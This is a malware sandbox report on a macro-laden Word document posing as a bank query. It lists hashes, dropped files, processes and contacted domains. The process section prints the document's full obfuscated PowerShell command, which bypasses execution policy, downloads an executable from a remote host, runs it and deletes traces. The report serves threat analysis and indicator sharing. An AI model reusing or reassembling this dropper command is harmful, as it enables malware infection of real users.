analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

BankqueryF01CITIPN2LO890.doc

Full analysis: https://app.any.run/tasks/0d9191fa-1425-490b-945b-3c89d9623e02
Verdict: Malicious activity
Analysis date: December 18, 2018, 20:48:28
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-close
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Author: Little Pig, Template: Normal, Last Saved By: Windows User, Revision Number: 4, Name of Creating Application: Microsoft Office Word, Total Editing Time: 03:00, Create Time/Date: Wed Dec 19 02:00:00 2018, Last Saved Time/Date: Tue Dec 18 18:04:00 2018, Number of Pages: 1, Number of Words: 0, Number of Characters: 1, Security: 0
MD5:

E29F745F23AF81313F65494585218A2C

SHA1:

FDE3DEB9CCD31076AF6653C99AF9604D39200900

SHA256:

DD848CDBC05D44A47189A00FBD5F83CFCE5E11A701259BE772857DD1408BE9E5

SSDEEP:

3072:S4KirS6vYv4p8ZtHDMdyN0L4IcXyPVV/4ddylf1f4LN:J41ZW4N0L4IAyj/iyZSh

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Executable content was dropped or overwritten

      • WINWORD.EXE (PID: 2676)

    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 2676)

    • Application was dropped or rewritten from another process

      • yubs6.exe (PID: 3504)
      • ofcvpat.exe (PID: 3628)

  • SUSPICIOUS

    • Executable content was dropped or overwritten

      • yubs6.exe (PID: 3504)

  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 2676)

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2676)

    • Dropped object may contain Bitcoin addresses

      • WINWORD.EXE (PID: 2676)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Title: -
Subject: -
Author: Little Pig
Keywords: -
Template: Normal
LastModifiedBy: Windows User
RevisionNumber: 4
Software: Microsoft Office Word
TotalEditTime: 3.0 minutes
CreateDate: 2018:12:19 02:00:00
ModifyDate: 2018:12:18 18:04:00
Pages: 1
Words: -
Characters: 1
Security: None
CodePage: Unicode (UTF-8)
Company: Microsoft
Lines: 1
Paragraphs: 1
CharCountWithSpaces: 1
AppVersion: 15
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts:
HeadingPairs:
  • Title
  • 1
  • Название
  • 1
CompObjUserTypeLen: 32
CompObjUserType: Microsoft Word 97-2003 Document
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
34
Monitored processes
3
Malicious processes
1
Suspicious processes
0

Behavior graph

Click at the process to see the details
drop and start start drop and start winword.exe yubs6.exe ofcvpat.exe

Process information

PID
CMD
Path
Indicators
Parent process
2676"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\BankqueryF01CITIPN2LO890.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Exit code:
0
Version:
14.0.6024.1000
3504"C:\Users\admin\AppData\Local\Temp\obexj\yubs6.exe" $iuwuiorlxwxvxkthbthulcgnp='y Bypas';$lmlupwgoxrzyoaa='ent).Do';$zzyecwzensleyuq='ce;';$yjsbmivzkfcruejhbf='cli';$nsaydliuejjiykugqv='et.Web';$yuuxfveqyadzeyvdaqkd='xe'');(';$uorjenhuheawwmjezseu='$rbersh';$ariiaeayiuyjzakzrvlyzpbc39='eh = ''esh';$oeauizoueaozn='); Start-';$uiayxbaooqvgpuiomier='mp+';$iyyifhozjqcwwcaoaj=';Set-Ex';$ogbumviuswzyqjeli='em ($e';$buovqwbduyimohxqzevihl='://mu';$yoaujgugcyuoioeeydyae='''\ofcv';$aeaaaursyroak='pat.e';$zkhoohcaocezii4='nv:te';$ygnliongiyeauearmaoxb='New-';$aehfvdhihdsrmirglneeezjavznw35='/Doc';$qeriykdhemmpraubsdcamsbv='rec';$zxehaxauraooj1='ect';$riltuzjuaoufhyalescpw0=',$path';$yormbggetchcgdmuyydi='ttps';$zhinjiaxgiikhoei='exe''';$scuizjfbxrsuuoaaeabl='ove-It';$aeeoyysgusjoialvu3='erh''';$aoozhuaueifalwhwdppbe='path;Rem';$jrrhioihydogcnaxlnoi82='+ ''\obexj';$msahtoonouaeziy=''') -';$dhxcfcurqpdsbdfxwinrrqhatad9='wnload';$eosggvaeayyei=' System.N';$yaiekxiumqhsluaoo28='files';$vhacfuaauwzurjiaiezf='s; $p';$jiaayoiyoycuoau='ank.pw/';$nofdtiaueieiexiaycw='Polic';$obzushbsajlhpqadlpuaeze='ecution';$umcavmiimgbfysvnbfpczaarjue1='File(''h';$iwdvomwrcqehobjeae='s -Sco';$ifnawgoxcuariebmsvenute='ath=($e';$lxyiohppetygyyaeoyo='/ums.';$iteeuyubsbckevfuaiie='ltib';$xlhaismvudhohnxoudujw='pe Proces';$tiemhffiqzadqjpixuo0='Obj';$qfugelztiyluuoe='Process f7f81a39-5f63-5b42-9efd-1f13b5431005#39;;$ebgibqsmoeuivceiuoxxnyuyo0='nv:temp ';$eaotcohyibtrueuxslsh='urse -for'; Invoke-Expression ($uorjenhuheawwmjezseu+$ariiaeayiuyjzakzrvlyzpbc39+$aeeoyysgusjoialvu3+$iyyifhozjqcwwcaoaj+$obzushbsajlhpqadlpuaeze+$nofdtiaueieiexiaycw+$iuwuiorlxwxvxkthbthulcgnp+$iwdvomwrcqehobjeae+$xlhaismvudhohnxoudujw+$vhacfuaauwzurjiaiezf+$ifnawgoxcuariebmsvenute+$zkhoohcaocezii4+$uiayxbaooqvgpuiomier+$yoaujgugcyuoioeeydyae+$aeaaaursyroak+$yuuxfveqyadzeyvdaqkd+$ygnliongiyeauearmaoxb+$tiemhffiqzadqjpixuo0+$zxehaxauraooj1+$eosggvaeayyei+$nsaydliuejjiykugqv+$yjsbmivzkfcruejhbf+$lmlupwgoxrzyoaa+$dhxcfcurqpdsbdfxwinrrqhatad9+$umcavmiimgbfysvnbfpczaarjue1+$yormbggetchcgdmuyydi+$buovqwbduyimohxqzevihl+$iteeuyubsbckevfuaiie+$jiaayoiyoycuoau+$yaiekxiumqhsluaoo28+$aehfvdhihdsrmirglneeezjavznw35+$lxyiohppetygyyaeoyo+$zhinjiaxgiikhoei+$riltuzjuaoufhyalescpw0+$oeauizoueaozn+$qfugelztiyluuoe+$aoozhuaueifalwhwdppbe+$scuizjfbxrsuuoaaeabl+$ogbumviuswzyqjeli+$ebgibqsmoeuivceiuoxxnyuyo0+$jrrhioihydogcnaxlnoi82+$msahtoonouaeziy+$qeriykdhemmpraubsdcamsbv+$eaotcohyibtrueuxslsh+$zzyecwzensleyuq);C:\Users\admin\AppData\Local\Temp\obexj\yubs6.exe
WINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3628"C:\Users\admin\AppData\Local\Temp\ofcvpat.exe" C:\Users\admin\AppData\Local\Temp\ofcvpat.exe
yubs6.exe
User:
admin
Company:
COMPELSON Labs
Integrity Level:
MEDIUM
Description:
Blocked Used Slows Shws
Total events
1 797
Read events
1 347
Write events
0
Delete events
0

Modification events

No data
Executable files
14
Suspicious files
0
Text files
122
Unknown types
2

Dropped files

PID
Process
Filename
Type
2676WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR9492.tmp.cvr
MD5:
SHA256:
2676WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:BFB90CF371FCEE43C7BFB74B2B0A4AB1
SHA256:5E71388D94847B479059CEEF2E10A35B21837B60A0A40B7E11455E3B7E5297E0
2676WINWORD.EXEC:\Users\admin\AppData\Local\Temp\obexj\Certificate.format.ps1xmlxml
MD5:C93A361112351B30E2C959E72789952D
SHA256:4379BD59C1328A6811584D424DF3DC193A5D607E2859D3AC1655B9124A5F100D
2676WINWORD.EXEC:\Users\admin\AppData\Local\Temp\obexj\CompiledComposition.Microsoft.PowerShell.GPowerShell.dllexecutable
MD5:A84B6952AB6A297CCE6C085FA8AB06CB
SHA256:54E3F8199D5C749920A2826C63D7C5E7E86D94874ADDCFD5C9B430671031017D
2676WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$nkqueryF01CITIPN2LO890.docpgc
MD5:55B61C0592C38A1BC8E98D52A42DF872
SHA256:97B7764EE92376EE1F63EDA000C5606FD08527C2E184C842495D88942DD6073F
2676WINWORD.EXEC:\Users\admin\AppData\Local\Temp\obexj\DotNetTypes.format.ps1xmlxml
MD5:1AB2FD4B6749AD6831C86411FDCAFB48
SHA256:98540086CFC986D7604FFDED977EF20944D1715BF8453809CE736C919CB6E1EF
2676WINWORD.EXEC:\Users\admin\AppData\Local\Temp\obexj\Diagnostics.Format.ps1xmltext
MD5:FF6EEB8125B9265C5BA40AF9F7C6F6BC
SHA256:7D569C1155CFA9B7BB2BA225EE409A55C8B0E8217F3A7E05BAA39DA1BD7C4689
2676WINWORD.EXEC:\Users\admin\AppData\Local\Temp\obexj\en-US\about_Arithmetic_Operators.help.txttext
MD5:04D0CDC53B434B3FE0022831C9D06A84
SHA256:D42C3639DC7E4816800B1221E74F682BC3E6C8F34D00CC4765B3ADEBC173BBBA
2676WINWORD.EXEC:\Users\admin\AppData\Local\Temp\obexj\en-US\about_arrays.help.txttext
MD5:04BB4AA2CF5A5D3EAD1D9F6EEA89C034
SHA256:0C058DF25203E39D339F127C0AE8235EE3E2E77F33B57F894E8E5A4AE6243EC8
2676WINWORD.EXEC:\Users\admin\AppData\Local\Temp\obexj\en-US\about_Comment_Based_Help.help.txttext
MD5:8D7E5AD25683E71CD1DFE4949A754BC5
SHA256:A653702F520D12525099F8C7FF70A92D812C3DD3965D2D4953C2FA6840916ECD
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
7
DNS requests
2
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3504
yubs6.exe
149.255.36.208:443
multibank.pw
Swiftway Sp. z o.o.
US
unknown
3628
ofcvpat.exe
109.248.149.94:443
deffected.com
KZ
unknown

DNS requests

Domain
IP
Reputation
multibank.pw
  • 149.255.36.208
suspicious
deffected.com
  • 109.248.149.94
unknown

Threats

No threats detected
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
BankqueryF01CITIPN2LO890.doc